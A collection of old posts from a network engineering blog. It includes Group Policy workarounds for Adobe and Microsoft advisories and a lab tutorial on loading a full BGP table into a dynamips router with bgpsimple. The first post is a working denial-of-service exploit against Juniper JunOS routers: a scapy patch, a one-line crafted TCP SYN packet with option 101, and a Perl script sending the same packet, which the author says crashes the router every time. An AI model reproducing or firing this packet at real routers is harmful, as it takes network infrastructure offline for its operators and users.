evilrouters.net

Photo from gr33ndata.

I just quickly hacked up scapy so that it would support sending TCP packets with option kind 0×65 (decimal 101). A diff is below (basically, just need to add two lines).

For reference, I’m on a FreeBSD 8.0 box running scapy 2.1.0 (from ports). inet.py is located in /usr/local/lib/python2.6/site-packages/scapy/layers.

$ diff inet.py inet.py.bak
203,204c203
<                 15 : ("AltChkSumOpt",None),
<                 101 : ("JunOS",None)
---
>                 15 : ("AltChkSumOpt",None)
215d213
<                 "JunOS":101
$

Once we've done that, we can then use scapy to launch a JunOS killin' packet for us!

$ sudo scapy
Welcome to Scapy (2.1.0)
>>> p=IP(dst='192.168.1.61')/TCP(dport=23,flags='S',options=[('JunOS', '')])
>>> send(p)
.
Sent 1 packets.
>>>

The box, of course, crashed and rebooted immediately.

This code works for me, over and over again. Let me know if it works for you. Sorry about the shitty quality of the video, all I had handy was my Blackberry.

UPDATE: I’ve posted a much better video of the crash in action.

$ cat junos-crash.pl 
#!/usr/bin/perl

my $host =      shift;
my $port =      shift;

use             Net::Packet qw($Env);

use             Net::Packet::IPv4;
my $ip =        Net::Packet::IPv4->new(dst => $host);

use             Net::Packet::TCP;

my $tcp =       Net::Packet::TCP->new(
                    dst         => $port,
                    options     =>  "\x65\x02\x01\x01", 
                );

use             Net::Packet::Frame;
my $frame =     Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);

$frame->send;

Now can I see your advisory, Juniper?

UPDATE: Nevermind, Juniper, I found it.

Yesterday, December 15th, Adobe posted APSA09-07, “Security Advisory for Adobe Reader and Acrobat”, which is summarized as follows:

Adobe has confirmed a critical vulnerability in Adobe Reader and Acrobat 9.2 and earlier versions that could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being actively exploited in the wild. Adobe recommends customers follow the mitigation guidance below until a patch is available.

Furthermore, Adobe mentioned that they plan to release an update by January 12, 2010. That’s 28 days — a LONG time for a security vulnerability that is being actively exploited in the wild. Fortunately, there appears to be a simple way to mitigate this vulnerability: disable JavaScript.

For individual users or those not on a corporate network, the easiest way is to simply do the following:

• Launch Adobe Acrobat or Adobe Reader
• Select Edit, then Preferences
• Select the JavaScript category
• Uncheck the “Enable Acrobat JavaScript” option
• Click OK

This should mitigate the issue.

Unfortunately, some of us have hundreds or thousands of desktops and visiting each one to change this setting is not feasible. Luckily, I stumbled across an Administrative Template for a Group Policy Object that was created by Elazar Broad earlier this year, in reference to APSA09-01. For those who may not be completely familiar with creating a Group Policy Object using this Administrative Template to disable the JavaScript functionality domainwide, I have created a video demonstration of how to do so.

First, download the administrative template here, then click here to watch the video.

UPDATE: If you’re not interesting in doing this yourself and just want to see it in action, check out the video, “Dumping 265k BGP routes into dynamips”. When I went through these steps to document, I ended up with 298,870 prefixes in my dynamips router. When I did it the second time, to record the video, I only ended up with 265,857 prefixes. Not sure why the discrepancy, but at least you can see it works! YMMV!

After I posted “Dynamips, a 7200, and a full BGP table”, a number of you left comments asking how I got the BGP routes into dynamips… the answer is einval’s “bgpsimple”.

“This perl script allows to setup an BGP adjacency with a BGP peer, monitor the messages and updates received from that peer, and to send out updates from a predefined set of NLRIs/attributes. BGP session and message handling is done by Net::BGP.”

0. Pre-requisites

On Ubuntu, at least, you’re going to need to install some packages that likely aren’t already installed. We’re going to need these to be able to build bgpdump in step 2. Fortunately, the following command will install everything you need (well, except for Net::BGP and bgpsimple):

[root@stewie ~]# apt-get install build-essential zlib1g-dev libbz2-dev

1. Install Net::BGP

Before we can even think about doing this, we’re going to need to install the Net::BGP perl modules, most likely from CPAN (your distribution may provide it in a handy installable package, but I wouldn’t count on it). I’m using an Ubuntu 8.04 LTS Server installation — you can use whichever distribution (or BSD) that you like, but this is what I’m using.

Fire up the CPAN shell:

[root@stewie ~]# perl -MCPAN -e shell

cpan shell -- CPAN exploration and modules installation (v1.9402)
Enter 'h' for help.

cpan[1]>

If this is the first time you’ve done this, you’ll have to go through some configuration. That configuration is out of scope of this document. Google it.

Next, install Net::BGP and exit the CPAN shell:

cpan[1]> install Net::BGP
CPAN: Storable loaded ok (v2.15)
Going to read '/home/jlgaddis/.cpan/Metadata'
  Database was generated on Thu, 20 Aug 2009 22:27:00 GMT
Running install for module 'Net::BGP'
Running make for K/KB/KBRINT/Net-BGP-0.13.tar.gz

[snip]

Appending installation info to /usr/lib/perl/5.8/perllocal.pod
  KBRINT/Net-BGP-0.13.tar.gz
  /usr/bin/make install  -- OK

cpan[2]> exit
Lockfile removed.
[root@stewie ~]#

2. Install bgpdump

As mentioned in bgpsimple’s README, we’re going to use a RIB dump from a router in the default-free zone. Fortunately, RIPE makes this data available for download. Before we can use it, however, we need to convert it to a format that bgpsimple can use. We’re going to download and compile bgpdump which can do the conversion for us.

[root@stewie ~]# wget http://www.ris.ripe.net/source/libbgpdump-1.4.99.9.tar.gz
--22:00:48--  http://www.ris.ripe.net/source/libbgpdump-1.4.99.9.tar.gz
           => `libbgpdump-1.4.99.9.tar.gz'
Resolving www.ris.ripe.net... 193.0.19.19
Connecting to www.ris.ripe.net|193.0.19.19|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 82,909 (81K) [application/x-gzip]

100%[=====================================================>] 82,909       130.32K/s

22:00:49 (129.85 KB/s) - `libbgpdump-1.4.99.9.tar.gz' saved [82909/82909]

[root@stewie ~]#

Uncompress the tarball and change to the newly created directory:

[root@stewie ~]# tar zxf libbgpdump-1.4.99.9.tar.gz
[root@stewie ~]# cd libbgpdump-1.4.99.9/

Be sure to skim through the README file in this directory.

Now, we can begin to build bgpdump. I don’t need IPv6 support, so I’m going to leave it out.

[root@stewie ~/libbgpdump-1.4.99.9]# ./configure --disable-ipv6
checking for gcc... gcc
checking for C compiler default output file name... a.out
checking whether the C compiler works... yes

[snip]

checking for inet_ntoa... yes
checking for inet_ntop... yes
checking for IPv6 support... disabled
configure: creating ./config.status
config.status: creating Makefile
config.status: creating bgpdump-config.h
[root@stewie ~/libbgpdump-1.4.99.9]#

Once the configure script has completed (successfully!), we can build bgpdump:

[root@stewie ~/libbgpdump-1.4.99.9]# make

[snip]

[root@stewie ~/libbgpdump-1.4.99.9]# ls -l bgpdump
-rwxr-xr-x 1 root root 46540 2009-08-20 22:14 bgpdump

As you see, we end up with a binary named “bgpdump”, which I’m going to copy over to /usr/local/bin. I’m also going to create a directory named “bgp”, where I’ll store the files we’ll be working with:

[root@stewie ~/libbgpdump-1.4.99.9]# cp bgpdump /usr/local/bin
[root@stewie ~/libbgpdump-1.4.99.9]# mkdir ../bgp
[root@stewie ~/libbgpdump-1.4.99.9]# cd ../bgp

3. Get some route data

Before we can inject any routes into our router, we need some routes to inject! As mentioned, RIPE makes these available to us. Go to the “RIS Raw Data” page, pick a collector, then download a file containing the raw data:

[root@stewie ~/bgp]# wget http://data.ris.ripe.net/rrc16/2009.08/bview.20090820.2359.gz
--22:59:26--  http://data.ris.ripe.net/rrc16/2009.08/bview.20090820.2359.gz
           => `bview.20090820.2359.gz'
Resolving data.ris.ripe.net... 193.0.19.19
Connecting to data.ris.ripe.net|193.0.19.19|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,108,638 (3.0M) [application/x-gzip]

100%[=====================================================>] 3,108,638    234.33K/s    ETA 00:00

22:59:40 (214.70 KB/s) - `bview.20090820.2359.gz' saved [3108638/3108638]

[root@stewie ~/bgp]#

Now that we have some routing data, we need to get it into a format that bgpsimple can work with. This is where bgpdump comes into play. Copying from bgpsimple’s README:

[root@stewie ~/bgp]# zcat bview.20090820.2359.gz | bgpdump -m - > myroutes
[root@stewie ~/bgp]#

4. Download bgpsimple

Download the code for bgpsimple:

[root@stewie ~/bgp]# wget http://bgpsimple.googlecode.com/files/bgp_simple.tgz
--23:11:17--  http://bgpsimple.googlecode.com/files/bgp_simple.tgz
           => `bgp_simple.tgz'
Resolving bgpsimple.googlecode.com... 209.85.225.82
Connecting to bgpsimple.googlecode.com|209.85.225.82|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,324 (9.1K) [application/x-gzip]

100%[=====================================================>] 9,324         --.--K/s

23:11:17 (114.18 KB/s) - `bgp_simple.tgz' saved [9324/9324]

[root@stewie ~/bgp]#

Uncompress the tarball:

[root@stewie ~/bgp]# tar zxf bgp_simple.tgz

You should end up with a Perl script named “bgp_simple.pl”:

[root@stewie ~/bgp]# ls -l bgp_simple.pl
-rwxr-xr-x 1 jlgaddis jlgaddis 20388 2009-01-07 10:31 bgp_simple.pl

5. Start up your dynamips router

Now it’s time to fire up our virtual 7200 router. Here’s the .net file for dynagen that I used (don’t forget to change the filenames and paths, as appropriate).

Start up dynamips, start up dynagen, connect to the console, and do some initial configuration:

[jlgaddis@stewie ~]$ telnet 192.168.1.109 2000
Trying 192.168.1.109...
Connected to 192.168.1.109.
Escape character is '^]'.
Connected to Dynamips VM "R1" (ID 0, type c7200) - Console port


              Restricted Rights Legend

Use, duplication, or disclosure by the Government is
subject to restrictions as set forth in subparagraph
(c) of the Commercial Computer Software - Restricted
Rights clause at FAR sec. 52.227-19 and subparagraph
(c) (1) (ii) of the Rights in Technical Data and Computer
Software clause at DFARS sec. 252.227-7013.

[snip]

Router> enable
Router# configure terminal
Router(config)# no ip domain lookup
Router(config)# no ip http server
Router(config)# hostname c7200
c7200(config)# line con 0
c7200(config-line)# exec-timeout 0 0
c7200(config-line)# logging synchronous

6. Configure dynamips router’s network interface

We need to put an IP address on the router’s fastethernet 2/0 interface, then verify that we can ping the host that we’re going to run bgpsimple on:

c7200(config-line)# interface fastethernet 2/0
c7200(config-if)# ip address 192.168.1.99 255.255.255.0
c7200(config-if)# no shutdown
c7200(config-if)#
*Aug 20 23:23:26.167: %LINK-3-UPDOWN: Interface FastEthernet2/0, changed state to up
*Aug 20 23:23:27.167: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet2/0,
changed state to up
c7200(config-if)# do ping 192.168.1.104

Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.1.104, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 4/8/12 ms

7. Configure the BGP session on your dynamips router

Next, we need to configure our dynamips router for a BGP session with bgpsimple. You will need to change IP address below (192.168.1.104) to the IP address of the box you are running bgpsimple on:

c7200(config-if)# router bgp 65000
c7200(config-router)# no synchronization
c7200(config-router)# no auto-summary
c7200(config-router)# neighbor 192.168.1.104 remote-as 65000

8. Test with a limited number of prefixes

Now that our dynamips router is configured for BGP, we’re ready for a quick test with a small number of prefixes (10, for now). Look at the README for what all these command-line options mean (I wrapped this for readability, you don’t have to):

[root@stewie ~/bgp]# ./bgp_simple.pl -myas 65000 -myip 192.168.1.104 \
> -peerip 192.168.1.99 -peeras 65000 -p myroutes -m 10 -n
---------------------------------------- CONFIG SUMMARY --------------------------------------------------
Configured for an iBGP session between me (ASN65000, 192.168.1.104) and peer (ASN65000, 192.168.1.99).
Will use prefixes from file myroutes.
Maximum number of prefixes to be advertised: 10.
Will spoof next hop address to 192.168.1.104.
----------------------------------------------------------------------------------------------------------
Sending full update.

[snip]

Looks like that worked, let’s take a look at the BGP table on our dynamips router:

*Aug 20 23:31:49.715: %BGP-5-ADJCHANGE: neighbor 192.168.1.104 Up
c7200# show ip bgp
BGP table version is 31, local router ID is 192.168.1.99
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
              r RIB-failure, S Stale
Origin codes: i - IGP, e - EGP, ? - incomplete

   Network          Next Hop            Metric LocPrf Weight Path
*>i1.1.1.0/24       192.168.1.104                   0      0 25152 6939 3303 8300 i
*>i3.0.0.0          192.168.1.104                   0      0 25152 6939 15412 9304 80 i
*>i3.51.92.0/23     192.168.1.104                   0      0 25152 23148 7018 ?
*>i4.0.0.0/9        192.168.1.104                   0      0 25152 1273 3356 i
*>i4.0.0.0          192.168.1.104                   0      0 25152 1273 3356 i
*>i4.21.103.0/24    192.168.1.104                   0      0 25152 6939 3549 46133 i
*>i4.23.88.0/24     192.168.1.104                   0      0 25152 23148 7018 46164 i
*>i4.23.88.0/23     192.168.1.104                   0      0 25152 23148 7018 46164 i
*>i4.23.89.0/24     192.168.1.104                   0      0 25152 23148 7018 46164 i
*>i4.23.92.0/22     192.168.1.104                   0      0 25152 23148 7018 46164 i
c7200#

And there’s our 10 routes! w00t!

9. Advertise all the routes!

Now that we now we can get an adjacency up and exchange routes, let’s go for the gusto!

Kill bgp_simple.pl (CTRL-C works) and let’s take a quick look at how many routes are in the “myroutes” file.

[root@stewie ~/bgp]# wc -l myroutes
300035 myroutes

In my case, we have just over 300k. Your numbers may vary slightly — and there very well may be duplicate prefixes — depending on which dump you download from RIPE. In order to inject all the routes, we just run bgp_simple.pl as before, but without the “-m 10″ (maximum of 10 prefixes to advertise) option (again, wrapped for readability):

[root@stewie ~/bgp]# ./bgp_simple.pl -myas 65000 -myip 192.168.1.104 \
> -peerip 192.168.1.99 -peeras 65000 -p myroutes -n
---------------------------------------- CONFIG SUMMARY --------------------------------------------------
Configured for an iBGP session between me (ASN65000, 192.168.1.104) and peer (ASN65000, 192.168.1.99).
Will use prefixes from file myroutes.
Maximum number of prefixes to be advertised: 10.
Will spoof next hop address to 192.168.1.104.
----------------------------------------------------------------------------------------------------------
Sending full update.

[snip]

And now we just watch the number of prefixes received continually go up on our dynamips router:

c7200# show ip bgp summary | begin Neighbor
Neighbor        V    AS MsgRcvd MsgSent   TblVer  InQ OutQ Up/Down  State/PfxRcd
192.168.1.104   4 65000   98425      21    98413    0    0 00:01:24    98237

c7200# show ip bgp summary | begin Neighbor
Neighbor        V    AS MsgRcvd MsgSent   TblVer  InQ OutQ Up/Down  State/PfxRcd
192.168.1.104   4 65000  141060      23   141069    0    0 00:02:04   140849

c7200# show ip bgp summary | begin Neighbor
Neighbor        V    AS MsgRcvd MsgSent   TblVer  InQ OutQ Up/Down  State/PfxRcd
192.168.1.104   4 65000  238966      25   238975    0    0 00:03:16   238739

We can take a quick look at a few of the prefixes in our BGP table:

c7200# show ip bgp 12.0.0.0/8 longer-prefixes | begin Network
   Network          Next Hop            Metric LocPrf Weight Path
*>i12.0.0.0/9       192.168.1.104                   0      0 25152 23148 7018 i
*>i12.0.0.0         192.168.1.104                   0      0 25152 23148 7018 i
*>i12.0.18.0/24     192.168.1.104                   0      0 25152 23148 7018 27585 i
*>i12.0.19.0/24     192.168.1.104                   0      0 25152 1273 3561 27487 i
*>i12.0.28.0/24     192.168.1.104                   0      0 25152 1273 4323 30050 i
*>i12.0.29.0/24     192.168.1.104                   0      0 25152 1273 174 30538 i
*>i12.0.33.0/24     192.168.1.104                   0      0 25152 1273 174 40544 i
*>i12.0.43.0/24     192.168.1.104                   0      0 25152 23148 7018 2386 i
*>i12.0.48.0/20     192.168.1.104                   0      0 25152 1273 174 1742 i
*>i12.0.153.0/24    192.168.1.104                   0      0 25152 23148 7018 6519 i
*>i12.0.170.0/24    192.168.1.104                   0      0 25152 23148 7018 22528 i
*>i12.0.239.0/24    192.168.1.104                   0      0 25152 19151 1239 33628 i
[snip]

That’s all there is to it!

10. All your routes are belong to us!

c7200# show ip bgp summary
BGP router identifier 192.168.1.99, local AS number 65000
BGP table version is 1038362, main routing table version 1038362
298870 network entries using 34967790 bytes of memory
298870 path entries using 15541240 bytes of memory
51910/51909 BGP path/bestpath attribute entries using 6436840 bytes of memory
47723 BGP AS-PATH entries using 1265376 bytes of memory
1 BGP community entries using 24 bytes of memory
0 BGP route-map cache entries using 0 bytes of memory
0 BGP filter-list cache entries using 0 bytes of memory
BGP using 58211270 total bytes of memory
BGP activity 668359/369489 prefixes, 668359/369489 paths, scan interval 60 secs

Neighbor        V    AS MsgRcvd MsgSent   TblVer  InQ OutQ Up/Down  State/PfxRcd
192.168.1.104   4 65000  669061      20  1038362    0    0 00:04:16   298870
c7200#

OPTIONAL: If the BGP connection between bgpsimple and your dynamips router dies due to a hold timer expiring, you can get around this by doing two things:

1. Editing bgp_simple.pl. At line 220, I added two lines:

        KeepAliveTime           => 600,
        HoldTime                => 1800,

That “section” of code (setting up the peer connection using Net::BGP::Peer) now reads like this:

my $bgp  = Net::BGP::Process->new();
my $peer = Net::BGP::Peer->new(
        Start                   => 0,
        ThisID                  => $myip,
        ThisAS                  => $myas,
        PeerID                  => $peerip,
        PeerAS                  => $peeras,
        KeepaliveCallback       => \&sub_keepalive_callback,
        UpdateCallback          => \&sub_update_callback,
        NotificationCallback    => \&sub_notification_callback,
        ErrorCallback           => \&sub_error_callback,
        OpenCallback            => \&sub_open_callback,
        ResetCallback           => \&sub_reset_callback,
        KeepAliveTime           => 600,
        HoldTime                => 1800,
);

1. Adjusting the BGP timers on the dynamips router, like so:

c7200# configure terminal
c7200(config)# router bgp 65000
c7200(config-router)# timers bgp 600 1800
c7200(config-router)# end

We can then see those values reflected here:

c7200# show ip bgp neighbor 192.168.1.104 | in Last
  Last read 00:00:00, last write 00:00:56, hold time is 1800, keepalive interval is 600 seconds
c7200#

Note that it’s probably best to change both sides (bgp_simple.pl and your router’s config), since BGP will use the lowest of the values configured between peers.

In case you haven’t been paying attention lately, Microsoft has recently released a couple of security advisories: 972890 and 973472.

Both of them are bad news — unpatched vulnerabilities allowing remote code execution. Microsoft has also stated in each of the security advisories:

We are aware of attacks attempting to exploit the vulnerability.

That’s bad news. At this time I’m writing this, the Internet Storm Center is already reporting more than two million infections in China alone.

While there are currently no patches, Microsoft has published workarounds for these issues. They involve setting a grand total of 47 killbits of Class Identifiers. This might be okay if you have only one PC and a couple hours to kill. For those of us who work in large organizations with hundreds or thousands of PCs, that’s just not feasible.

I have posted two administrative templates that can be used in group policy objects (GPOs) to automate this. They can be downloaded here:

• Administrative template for MS 972890
• Administrative template for MS 973472

For those who may not be used to using their own administrative templates to push out registry settings like this, I’ve recorded a video for you. I hope it’s helpful!

• If your screen isn’t “wide” enough, you can watch the video here instead.